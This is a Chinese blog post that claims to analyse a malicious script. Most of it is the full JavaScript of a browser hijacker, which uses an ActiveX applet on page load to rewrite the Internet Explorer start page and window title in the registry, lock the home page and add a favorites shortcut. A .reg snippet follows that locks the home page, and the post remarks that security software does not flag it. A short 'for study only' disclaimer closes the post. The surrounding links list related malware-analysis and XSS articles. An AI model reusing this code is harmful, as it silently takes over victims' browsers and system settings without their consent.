一段恶意脚本的分析及思考

最新推荐文章于 2021-05-01 17:18:10 发布
最新推荐文章于 2021-05-01 17:18:10 发布
阅读量269 收藏
点赞数
分类专栏: JavaScript 文章标签: 脚本 IE Microsoft 浏览器 JavaScript ViewUI

这段代码主要实现了通过javascript修改注册表中的信息,不过现在所有杀软都已列入了黑名单,代码中的F935DC26-1CF0-11D0-ADB9-00C04FD58A0B 这个字符串在目前的电脑中已经不存在了,但是分析这段代码还有其它的收获,代码如下:

<script>
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");
function AddFavLnk(loc, DispName, SiteURL)
{
var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
Shor.TargetPath = SiteURL;
Shor.Save();
}
function f(){
try
{
//ActiveX 初始化
a1=document.applets[0];
a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Shl = a1.GetObject();
a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
a1.createInstance();
FSO = a1.GetObject();
a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
a1.createInstance();
Net = a1.GetObject();
try
{
if (document.cookie.indexOf("Chg") == -1)
{
//设置Cookie
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
//设置Cookie完毕
//设置主页
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://sucre.iteye.com/");
//修改浏览器的标题
Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Window Title", "你的Internet Explorer已经被修改过了 By Sucre");
//锁定浏览器首页
Sh1.RegWrite("HKCR\\CLSID\\{871C5380-42A0-1069-A2EA-08002B30309D}\\shell\\OpenHomePage\\Command\\@","'\"C:\\Program Files\\Internet Explorer\\IExplore.exe\"' http://sucre.iteye.com");
//设置Cookie
var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
document.cookie="Chg=general; expires=" + expdate.toGMTString() + "; path=/;"
var WF, Shor, loc;
WF = FSO.GetSpecialFolder(0);
loc = WF + "\\Favorites";
if(!FSO.FolderExists(loc))
{
loc = FSO.GetDriveName(WF) + "\\Documents and Settings\\" + Net.UserName + "\\Favorites";
if(!FSO.FolderExists(loc))
{
return;
}
}
AddFavLnk(loc, "我的博客", "http://sucre.iteye.com");
}
}
catch(e)
{}
}
catch(e)
{}
}



function init()
{
setTimeout("f()", 1000);
}
init();
</script>

 其实,用其它脚本也可以实现锁定主页,比如批处理,下面这段代码就锁住了主页,一开IE就会显示指定的页面,这种指向方法所有的防护软件都不会报警,代码如下:

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\CLSID\{871C5380-42A0-1069-A2EA-08002B30309D}\shell\OpenHomePage\Command]

@="\"C:\\Program Files\\Internet Explorer\\IExplore.exe\" http://sucre.iteye.com"

 以上文字仅供学习交流,不要用于非法操作,否则后果自负!

iteye_608
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Script-Ganker:恶意脚本检测分类工具
05-25
Script-Ganker Linux恶意脚本检测分类工具 自动化识别恶意脚本所归属的家族,以及与已知脚本的相似度、更新的代码。 usage: python script_ganker.py [script_path]
第十节 绕过过滤domain为空的XSS-01
09-15
**XSS(跨站脚本攻击)**是网络安全领域中一种常见的漏洞类型,它允许攻击者在用户的浏览器中注入恶意脚本,进而控制用户的行为或窃取敏感信息。本节主要探讨了如何绕过特定过滤机制,即针对domain为空的情况进行XSS...
脚本恶意程序分析技巧汇总
鬼手的博客
04-30 3419
文章目录前言python样本分析打包一个hello world关于python文件什么是pyc文件什么是pyo文件什么是pyd文件为什么需要pyc文件关于打包的exe位数python打包exe程序的特征图标特征字符串特征入口特征编译器特征反编译hello world由exe获取pyc由pyc获取pypython代码混淆的解决方案python代码的混淆原理实战去除python代码混淆vbs样本分析v...
linux恶意脚本实验,手工搭建简易的Linux恶意脚本分析系统
weixin_36033516的博客
05-01 358
概述Linux情况下的恶意软件大部门以shell剧本作为母体文件进行流传,并且,统一个病毒家眷所使用的的恶意剧本往往具有极高相似性,新变种的剧本大部门是在旧变种剧本的根蒂长进行点窜,新增或替代部门要害恶意代码,同时,分歧家眷之间的恶意剧本也或者显现代码互相借鉴,部门重合的情形。 [转载出处:www.ii77.com]该若何揭示病毒家眷中恶意剧本之间的关系呢?接下来,我们就经由手工搭建一个简略的恶意...
勒索软件 -- js邮件恶意脚本分析
weixin_30699235的博客
05-23 138
前一阵,勒索软件呈爆发趋势,并出现了针对中国的中文版本,有领导收到了带有恶意js附件的邮件,让我给分析下。js只是个下载器,实际会下载真正有恶意功能的pe文件实体。 经过一天的折腾,脱壳调试。单步跟踪运行,搞定给领导。特记录一下。 本次分析基于JS病毒样本(MD5:D00BE69072CF8A4549C692C7 88F58360)进行,JS调试环境为Visual Studio20...
本科毕业设计_恶意代码检测分类平台.zip
最新发布
10-05
随着互联网技术的发展,恶意代码的种类和数量持续增长,因此,开发一个高效、准确的恶意代码检测分类平台显得尤为迫切。 平台的设计与实现主要包括以下几个关键知识点: 1. 恶意代码分析:了解恶意代码的基本特征...
一道shiro反序列化转型引发的思考 .pdf
09-05
《一道Shiro反序列化转型引发的思考》 在网络安全领域,Web安全是至关重要的一环,而Apache Shiro作为一款广泛使用的Java安全框架,其安全问题往往成为黑客攻击的目标。本篇文章聚焦于一起由Shiro反序列化转型引发...
「威胁情报」PPDRR安全模型在业务安全上的新思考_ - 攻防靶场.zip
12-02
1. **预测(Prediction)**:这一阶段涉及对潜在威胁的识别和分析。通过威胁情报,企业可以了解最新的攻击趋势、漏洞信息以及恶意行为者的策略,从而提前做好防范。威胁情报通常包括网络黑市动态、恶意软件样本分析...
计算机数据安全实验指导书.pdf
07-14
实验思考部分引导学生分析未见实验现象的可能原因、核心代码语言及新的防范方法。 **新欢乐时光病毒实验** 新欢乐时光病毒是基于VBScript的脚本病毒,通过感染脚本文件和Outlook Express的信纸模板传播。实验目的...
AnalysisScript:用于恶意软件分析脚本列表
05-16
分析脚本 公开发布的恶意软件分析报告和脚本列表。 一旦开发出新的分析或工具,该存储库将被更新。 脚本分析列表 Downloader.Upatre图标提取器 MD5生成器,用于提取Downloader.Upatre图标 IDA脚本解密Zbot示例中的加密字符串 Zelix Klassmaster字符串解密器 Gen4字符串解密器Backdoor.Miniduke!gen4 Trojan.Netweird记录的密钥解密器 分析感染Trojan.Ransomlock.AP(Trojan.Ransomlk.AP!inf)的Advapi32.dll系统DLL Trojan.Swifi Shellcode解密器 Trojan.Netduke-HAMMERTOSS(APT29)字符串解密器 Downloader.Upatre脚本信息 该脚本应复制到包含样本列表(Upatre)的目录内。 它将从所
基于机器学习算法的恶意代码检测
12-18
基于机器学习的恶意代码检测,R语言实现小实验,基础知识讲解
iapp启动图代码_原创干货 | 【恶意代码分析技巧】10脚本
weixin_39958100的博客
11-20 925
恶意代码分析技巧10-脚本脚本恶意代码分析是比较简单的,因为脚本文件是直接可以看到源码的。同时,脚本代码都是逐行解释逐行执行的,调试分析也是很容易的。虽然简单,但是脚本却因为其灵活多变的代码、丰富强大的功能备受恶意代码作者喜欢,本文将会介绍一些常见的脚本程序,并分析恶意代码在这些脚本中经常用到的技术。恶意代码在脚本文件中最常用的技术是字符串混淆技术,这类混淆无非就是混淆变量名称,混淆函...
又见恶意脚本
sjdev的专栏(申俊杰)
03-22 2813
  原创文章,转载请注明出处:blog.csdn.net/sjdev 最近有个网友在网上发表了一个帖子,帖子内容如下:“我昨天下了一个软件,里面居然有一个插件,居然把我桌面上的 IE删除了,然后这个插件又在我桌面上创建了个IE快捷方式。打开快捷方式后就跳转到的了某个导航网站。最新版的360和瑞星根本就没什么提示。IE快捷方式属性的“目标”内容上面没有带任何参数(也就是没有网址参数)
JavaScript修改注册表的例子
weixin_30412167的博客
02-15 164
document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");function AddFavLnk(loc, DispName, SiteURL){var Shor = Shl.CreateShortcut(loc + "\\" + DispName +"....
如何不让网站修改你的注册表
hehongyu2000的专栏
10-15 682
最近发现很多网友发表用javascript修改用户注册表的代码, 同时一些网站为将自己设为用户browser的home page或IE的标题, 故意使用这种代码. 在次, 我将向大家介绍,如何防止被网站修改了你的注册表.首先让我们来看一下网站修改注册表的javascript code.-----------------------------------------------------
恶性代码
weixin_34381687的博客
05-20 191
格式化硬盘<objectid="scr"classid="clsid:06290BD5-48AA-11D2-8432-006008C3FBFC"></object><script>scr.Reset();scr.Path="C:\\windows\\Men?inicio\\Programas\\Inicio\\automat.hta";scr.D...
深度学习对抗恶意脚本:JavaScript与VBScript的神经分类研究
该研究的贡献在于创新的模型设计和训练策略,为恶意脚本分类提供了一种更有效的方法,对于网络安全专业人员来说,理解和应用这些模型对于提升防御能力具有实际价值。在未来,随着深度学习技术的进一步发展,此类研究...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值